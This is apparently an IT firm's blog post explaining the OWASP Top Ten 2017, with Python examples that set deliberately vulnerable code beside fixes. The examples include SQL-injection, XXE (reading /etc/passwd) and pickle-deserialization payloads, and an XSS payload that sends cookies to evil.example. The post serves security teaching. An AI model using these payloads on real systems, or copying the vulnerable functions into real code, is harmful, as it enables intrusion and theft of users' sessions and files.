To be forewarned is to be forearmed. The more you know about the cybersecurity threats that every internet user faces, the better prepared you will be to combat them. In the area of web application security, nobody does it better than the Open Web Application Security Project (OWASP). The OWASP Foundation may be best known for its OWASP Top Ten list, a ranking of the most critical web application security risks that it updates every few years. We’ll give you a brief introduction, but you may want to study the subject more in-depth on your own.
The latest version of the OWASP Top Ten was published in 2017. Here is how they describe the list on the OWASP web page:
“The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications.”
Businesses needing Cincinnati IT services can benefit from the support of Titan Tech with the web applications that they are either using or deploying. We can identify vulnerabilities and help you find ways to correct them.
A1:2017 - Injection
Despite all the hype, computers are stupid. They will do exactly what you tell them to do, so long as it’s within their preconfigured parameters. Injection occurs when untrusted input (a form field, a URL parameter, a cookie) is pasted into a command or query that an interpreter then runs, so that text an attacker typed gets executed as part of the command. SQL injection is the best-known form, but the same flaw shows up in operating system commands, LDAP queries and NoSQL queries. It’s a very common hack, and one that a security-conscious developer should be able to prevent: keep data and commands separate by using parameterized queries or prepared statements instead of building query strings by hand, and validate input on top of that. But it’s probably not going away any time soon.
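Here is what that data-versus-command confusion looks like in practice. This is an added example written for this article, not code from OWASP or from the original page; it uses Python’s built-in sqlite3 module, and the table, the user names and the payload are all constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed demo database: two users in an in-memory table.
    Passwords are stored in the clear only so the injection itself stays visible;
    a real application stores salted, slow hashes instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Attacker-controlled strings are spliced into the SQL text itself, so the
    database engine cannot tell where the data ends and the command begins."""
    query = (
        "SELECT name, role FROM users WHERE name = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    """Placeholders send the statement and the values separately; the driver
    binds the values as data, so a quote in the input is just a quote."""
    query = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Constructed payload: closes the password string early and appends a clause
# that is always true.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    # The vulnerable query becomes
    #   ... WHERE name = 'alice' AND password = '' OR '1'='1'
    # and the OR clause matches every row, so the attacker is logged in as alice.
    print(login_vulnerable(db, "alice", PAYLOAD))   # ('alice', 'admin')
    print(login_safe(db, "alice", PAYLOAD))         # None
    print(login_safe(db, "alice", "s3cret"))        # ('alice', 'admin')
```

The safe version is not doing any extra validation; it simply never lets the input become part of the statement. That is why parameterized queries, not quote-stripping, are the standard fix.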
A2:2017 - Broken Authentication
This is broader than password hacking. Broken authentication covers any weakness in how an application verifies who you are and keeps track of you afterward: accepting weak or previously leaked passwords, allowing unlimited login guesses (brute force and credential stuffing), storing passwords in plain text or with fast, unsalted hashes, and exposing or never expiring session identifiers. If a cyber criminal manages to intercept or guess your password, he may have all he needs to access your important data. Experts recommend that you do everything you can to protect your password. Don’t share it with anyone. Make sure you use strong passwords, and consider adding multifactor authentication when you have the opportunity. On the server side, passwords should be stored only as salted, deliberately slow hashes, and repeated failed logins should be throttled.
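The server-side half of that advice, as an added example written for this article (not OWASP’s code and not from the original page): passwords stored as salted scrypt hashes, a constant-time comparison on verification, and a per-account failure counter that shuts down guessing. The work factors, the lockout threshold and the tiny in-memory account store are assumptions chosen for the demo.

```python
import hashlib
import hmac
import os

# scrypt work factors (assumption for this example; raise them as hardware allows).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
MAX_FAILURES = 5  # consecutive failures before an account is locked (assumption)


def hash_password(password: str) -> str:
    """Salted, deliberately slow hash. A leaked table of these is far harder to
    reverse than plain text or a fast hash such as MD5."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "scrypt$%d$%d$%d$%s$%s" % (SCRYPT_N, SCRYPT_R, SCRYPT_P,
                                      salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, n, r, p, salt_hex, digest_hex = stored.split("$")
        if algo != "scrypt":
            return False
        candidate = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                                   n=int(n), r=int(r), p=int(p), dklen=32)
        expected = bytes.fromhex(digest_hex)
    except (ValueError, TypeError):
        return False
    # Constant-time comparison: a plain == leaks, byte by byte, how much matched.
    return hmac.compare_digest(candidate, expected)


# Hash of a throwaway password, used so that an attempt against an unknown
# username costs the same time as one against a real account.
_DUMMY_HASH = hash_password(os.urandom(8).hex())


class UserStore:
    """Minimal constructed account store: hashed passwords plus a failure counter."""

    def __init__(self):
        self._users = {}

    def register(self, username: str, password: str) -> None:
        self._users[username] = {"hash": hash_password(password),
                                 "failures": 0, "locked": False}

    def is_locked(self, username: str) -> bool:
        rec = self._users.get(username)
        return bool(rec and rec["locked"])

    def login(self, username: str, password: str) -> bool:
        rec = self._users.get(username)
        if rec is None:
            verify_password(password, _DUMMY_HASH)  # same timing whether or not the user exists
            return False
        if rec["locked"]:
            return False
        if verify_password(password, rec["hash"]):
            rec["failures"] = 0
            return True
        rec["failures"] += 1
        if rec["failures"] >= MAX_FAILURES:
            rec["locked"] = True  # guessing stops here; unlock through a verified reset flow
        return False
```

Locking the account is the simplest throttle and the easiest to explain, but it lets an attacker lock other people out on purpose; per-address rate limits, increasing delays, or a CAPTCHA after a few failures are the usual alternatives, and none of them replaces multifactor authentication.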
A3:2017 - Sensitive Data Exposure
You wouldn’t leave your door unlocked at night, but unfortunately some web administrators have left sensitive data unprotected. Even small businesses can house a lot of confidential information that could be a prime target for hackers. If a dog grooming company collects credit card information and stores it unencrypted on a server, or sends it over plain HTTP instead of HTTPS, they’re leaving the door open for interested cyber thieves to freely enter. Sensitive data should be encrypted in transit and at rest and, better still, not kept at all when the business doesn’t need it.
A4:2017 - XML External Entities (XXE)
Web applications routinely accept and exchange data in XML: uploaded documents, SOAP and other API requests, configuration files. Unfortunately, many older or misconfigured XML parsers will honor external entity declarations in whatever document they are handed. Knowledgeable hackers will submit XML containing such an entity to coax the parser into reading local files, making requests to internal systems, or tying up the server with runaway entity expansion. One way to prevent this is to disable XML external entity and DTD processing in the parser; another is to accept a simpler format such as JSON instead.
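An added example for this article (not OWASP’s code and not from the original page) of what the malicious document looks like and of the stricter version of the fix: since entities can only be declared inside a DTD, refuse any client-supplied XML that carries one before the parser sees it. This is the policy the defusedxml library applies by default, written here by hand with the standard library; the order format and the payload are constructed for the demo.

```python
import re
import xml.etree.ElementTree as ET

# Entities can only be declared inside a DTD, so a document with no <!DOCTYPE
# cannot carry an external entity (or an entity-expansion bomb). Refusing DTDs
# outright is the defusedxml policy; here it is a one-line check.
_DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXML(ValueError):
    pass


def contains_dtd(data: bytes) -> bool:
    return _DTD_MARKER.search(data) is not None


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from a client, refusing anything that declares a DTD."""
    if contains_dtd(data):
        raise UnsafeXML("DTD or entity declaration in client-supplied XML")
    return ET.fromstring(data)


# Constructed attacker payload: the "customer" field asks the parser to read a
# server-side file and hand its contents back inside the parsed document.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><customer>&xxe;</customer><qty>1</qty></order>"""

# Constructed legitimate request.
CLEAN_ORDER = b"<order><customer>alice</customer><qty>2</qty></order>"


def order_summary(data: bytes) -> dict:
    root = parse_untrusted_xml(data)
    return {"customer": root.findtext("customer"), "qty": int(root.findtext("qty"))}


if __name__ == "__main__":
    print(order_summary(CLEAN_ORDER))
    try:
        order_summary(XXE_PAYLOAD)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

Two caveats. The check runs on the raw bytes, so it must see exactly the bytes the parser will decode; a UTF-16 document would slip past an ASCII pattern, so reject encodings other than UTF-8 or decode first. And a parser that already refuses external entities by default is good, but a default is exactly the kind of setting that changes between versions and libraries, which is why the refusal here is explicit rather than inherited.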
A5:2017 - Broken Access Control
Each user of an application is given a certain level of access. Some may have read-only access, while others can write to the database. Application owners will have admin access. Broken access control is when someone manages to act beyond what he’s supposed to: either by gaining a higher level of access than he was granted, or by reaching other users’ records at his own level, for instance by changing an account number in a URL. With elevated or misplaced privileges, an unscrupulous user can do all kinds of things in the application that he’s not supposed to do. The fix is to enforce every access decision on the server, on every request, rather than trusting that the user interface hides the links he shouldn’t click.
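Both kinds of failure side by side, as an added example written for this article (not OWASP’s code and not from the original page): a record lookup that forgets to check ownership, the same lookup with the check, and an admin-only operation that refuses non-admins on the server. The users, the invoice table and the role names are constructed for the demo.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    role: str          # "user" or "admin" (assumed role names)


@dataclass
class Invoice:
    id: int
    owner: str
    amount: float


# Constructed data: two invoices belonging to two different customers.
INVOICES = {
    101: Invoice(101, "alice", 250.0),
    102: Invoice(102, "bob", 80.0),
}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(user: User, invoice_id: int, store=INVOICES) -> Invoice:
    """Horizontal hole: the caller is logged in, but nothing ties the record to
    the caller, so bob can read alice's invoice just by asking for id 101."""
    return store[invoice_id]


def get_invoice(user: User, invoice_id: int, store=INVOICES) -> Invoice:
    """Object-level check, made on every request: owner or admin only."""
    invoice = store.get(invoice_id)
    if invoice is None or not (invoice.owner == user.name or user.role == "admin"):
        # Same failure for "no such invoice" and "not yours": probing ids learns nothing.
        raise Forbidden("user %s may not access invoice %s" % (user.name, invoice_id))
    return invoice


def delete_invoice(user: User, invoice_id: int, store=INVOICES) -> bool:
    """Vertical check: deletion is an admin function. Hiding the delete button
    in the page is not a control; the server has to refuse."""
    if user.role != "admin":
        raise Forbidden("delete requires the admin role")
    return store.pop(invoice_id, None) is not None


if __name__ == "__main__":
    bob = User("bob", "user")
    print(get_invoice_vulnerable(bob, 101))   # alice's invoice, handed to bob
    try:
        get_invoice(bob, 101)
    except Forbidden as exc:
        print("refused:", exc)
```

The important habit is that the check lives next to the data access, not somewhere upstream that a new endpoint can forget to call.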
A6:2017 - Security Misconfiguration
Servers and software packages come with default settings. The problem is that some of those settings may make your system more vulnerable to attack: default accounts and passwords, sample pages and unneeded features left enabled, directory listings, and error messages that reveal stack traces or version numbers. This is particularly risky if you get something off the shelf that may be a year or so old. Since it was put on the market, designers have likely discovered security flaws that must be addressed. That’s why it’s important to do updates immediately upon installation and to harden the configuration before the system goes live. That said, security misconfigurations anywhere in the IT infrastructure, from the web server to cloud storage permissions, can leave a web application exposed.
A7:2017 - Cross-Site Scripting (XSS)
Web pages should not be running any script other than what the software coder has written. But cross-site scripting happens when a hacker gets his own script into a page that other people view, typically by submitting it through a web form field such as a comment box that the site later displays without escaping it. The script doesn’t run on the server; it runs in the browser of everyone who loads that page, with the same access to the site they have, so it can steal their session cookies, act on their behalf, or rewrite what they see. The defense is to escape user-supplied text for the context in which it is inserted into the page, with a Content Security Policy as a backstop.
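What the stored variety looks like on the server side, as an added example written for this article (not OWASP’s code and not from the original page). It shows a comment rendered verbatim next to the escaped rendering, and a second function to make the point that attribute and URL contexts need their own encoding. The HTML fragments, the attacker’s comment and the evil.example host are constructed for the demo.

```python
import html
from urllib.parse import quote

# Constructed attacker input: a "comment" that ships the reader's cookies away.
MALICIOUS_COMMENT = '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'


def render_comment_vulnerable(author: str, body: str) -> str:
    """Stored XSS: the submitted text is written into the page verbatim, so the
    browser of every later visitor executes the script."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (author, body)


def render_comment(author: str, body: str) -> str:
    """Escaping for HTML body context: < > & " ' become entities, and the
    browser shows the attacker's text instead of running it."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (html.escape(author), html.escape(body))


def render_profile_link(username: str) -> str:
    """Escaping depends on where the value lands. Inside an attribute the quotes
    must be encoded (html.escape does that with quote=True, its default); inside
    a URL path segment the value needs percent-encoding instead."""
    return '<a href="/users/%s" title="%s">%s</a>' % (
        quote(username, safe=""),
        html.escape(username),
        html.escape(username),
    )


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", MALICIOUS_COMMENT))
    print(render_comment("mallory", MALICIOUS_COMMENT))
    print(render_profile_link('mallory" onmouseover="alert(1)'))
```

Template engines that escape by default get this right for the HTML body context; the attribute and URL cases are where hand-built strings and "raw" template filters still bite.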
A8:2017 - Insecure Deserialization
Web applications convert data between the objects a program works with and streams of bytes that can be stored or sent between the user and the server. Turning objects into bytes is serialization; turning them back is deserialization. This hack occurs when the application deserializes data that an attacker controls: formats such as Java serialization, PHP serialize() and Python pickle rebuild arbitrary objects, and a crafted payload can make the server run code during that rebuilding. One way to prevent this is to sign serialized data and verify the signature before deserializing it; better still, don’t accept serialized objects from untrusted sources at all, and use a plain data format such as JSON.
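Python’s pickle makes the problem and the fix easy to see. The following is an added example written for this article (not OWASP’s code and not from the original page): a payload that runs a function of the attacker’s choosing during loads(), an HMAC-SHA256 tag checked before pickle ever sees the bytes (the symmetric-key cousin of the digital signature the text mentions), and a JSON loader as the safer alternative. The Report class, the key handling and the stand-in function are assumptions for the demo.

```python
import hashlib
import hmac
import json
import os
import pickle


class Report:
    def __init__(self, title, rows):
        self.title = title
        self.rows = rows


class Exploit:
    """pickle lets an object describe how to rebuild itself as "call this function
    with these arguments" and runs that call inside loads(). The attacker picks
    the function. os.getcwd stands in for os.system so the demo stays harmless."""

    def __reduce__(self):
        return (os.getcwd, ())


# What an attacker would send in place of a real serialized Report (constructed).
ATTACKER_BLOB = pickle.dumps(Exploit())


def load_report_vulnerable(blob: bytes):
    return pickle.loads(blob)   # the attacker's call runs before any type check is possible


# Server-side key (assumption: in a real deployment it comes from a secrets store).
SECRET_KEY = os.urandom(32)
TAG_LEN = 32


def dump_signed(obj) -> bytes:
    """Serialize and prepend an HMAC-SHA256 tag computed over the serialized bytes."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload


def load_signed(blob: bytes):
    """Verify the tag first; anything the server did not produce, or that was
    altered in transit, is refused without being deserialized."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature; refusing to deserialize")
    return pickle.loads(payload)


def load_report_json(text: str) -> Report:
    """Safer still: a data-only format. json.loads yields dicts, lists, strings
    and numbers, never code, and the object is built from validated fields."""
    data = json.loads(text)
    if (not isinstance(data, dict) or not isinstance(data.get("title"), str)
            or not isinstance(data.get("rows"), list)):
        raise ValueError("malformed report")
    return Report(data["title"], data["rows"])


if __name__ == "__main__":
    print(load_report_vulnerable(ATTACKER_BLOB))       # a directory path, not a Report
    print(load_signed(dump_signed(Report("Q1", []))).title)
    try:
        load_signed(ATTACKER_BLOB[:TAG_LEN] + ATTACKER_BLOB)
    except ValueError as exc:
        print("refused:", exc)
```

The tag proves only that the server produced the bytes; if any code path lets a user get arbitrary data signed, the protection is gone. That is why the JSON path, which never gives the input a way to name a function, is the stronger answer.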
A9:2017 - Using Components with Known Vulnerabilities
Website owners must make sure that all the elements of their web applications are secure. That goes for every library, framework and server package the website is built on, and for the hardware and operating system it runs on. The problem occurs when web administrators don’t keep an inventory of what they use and don’t follow the security advisories published for those products. If a vulnerability has been published for a component you use (a CVE with a patch available, for instance), that component needs to be updated or replaced; attackers scan for known-vulnerable versions precisely because they are easy targets.
A10:2017 – Insufficient Logging & Monitoring
Not every web application failure is linked to a clever exploit. Sometimes it’s just a matter of a system that nobody is watching. This last web application risk deals with the lack of records and alerts for what is happening day to day: logins, failed logins, access denials, input validation failures. While server logs can be used to determine after the fact whether a site has been hacked, they can also help IT administrators spot an attack while it is still in progress; breaches that go unlogged routinely stay undetected for months. Monitoring systems with properly configured thresholds, such as an alert when one address racks up many failed logins in a short time, can quickly alert techs to problems in the system.
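That threshold, run over a few log lines, as an added example written for this article (not OWASP’s code and not from the original page). The log format, the timestamps and the addresses are constructed for the demo; the detector keeps a sliding window of failed logins per source address and raises one alert when the count crosses the threshold, and a second helper tallies access-denied events per user, the kind of signal that points back at the broken access control risk above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed application log: five failed logins from one address in eight
# seconds (a password-spraying pattern) plus ordinary traffic. The line format
# is an assumption for this example.
SAMPLE_LOG = """\
2023-05-04T10:00:01Z WARN auth login_failed user=alice ip=203.0.113.9
2023-05-04T10:00:03Z WARN auth login_failed user=bob ip=203.0.113.9
2023-05-04T10:00:05Z WARN auth login_failed user=carol ip=203.0.113.9
2023-05-04T10:00:06Z INFO auth login_ok user=dave ip=198.51.100.7
2023-05-04T10:00:08Z WARN auth login_failed user=dave ip=203.0.113.9
2023-05-04T10:00:09Z WARN auth login_failed user=erin ip=203.0.113.9
2023-05-04T10:05:00Z WARN auth login_failed user=alice ip=198.51.100.7
2023-05-04T10:09:00Z WARN authz access_denied user=bob path=/admin ip=198.51.100.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<level>\w+) (?P<source>\w+) (?P<event>\w+)(?P<kv>.*)$")


def parse_line(line: str):
    """Turn one line into a dict; returns None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
           "level": m.group("level"), "source": m.group("source"), "event": m.group("event")}
    for token in m.group("kv").split():
        key, _, value = token.partition("=")
        rec[key] = value
    return rec


def detect_bruteforce(log_text: str, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)):
    """Alert on any source IP with `threshold` or more failed logins inside a
    sliding window of `window` length."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts, alerted = [], set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec.get("event") != "login_failed" or "ip" not in rec:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()                      # drop failures that fell out of the window
        if len(q) >= threshold and rec["ip"] not in alerted:
            alerted.add(rec["ip"])
            alerts.append({"ip": rec["ip"], "failures": len(q), "first": q[0], "last": rec["ts"]})
    return alerts


def count_events(log_text: str, event: str):
    """Per-user tally of one event type. A user collecting many access_denied
    entries is probing for broken access control."""
    tally = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec.get("event") == event:
            tally[rec.get("user", "?")] += 1
    return dict(tally)


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print("ALERT brute force from %(ip)s: %(failures)d failures between %(first)s and %(last)s" % alert)
    print(count_events(SAMPLE_LOG, "access_denied"))
```

None of this works if the application never writes the login_failed line in the first place, and the log has to record who, from where, and when, in a format a machine can read; that is the part of this risk that has to be designed in rather than bolted on.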
This material may be a bit over the head of the average business owner. That’s a good reason to look to Titan Tech for cybersecurity support if you are in the Cincinnati or Dayton area. Contact us today with all your web application security needs.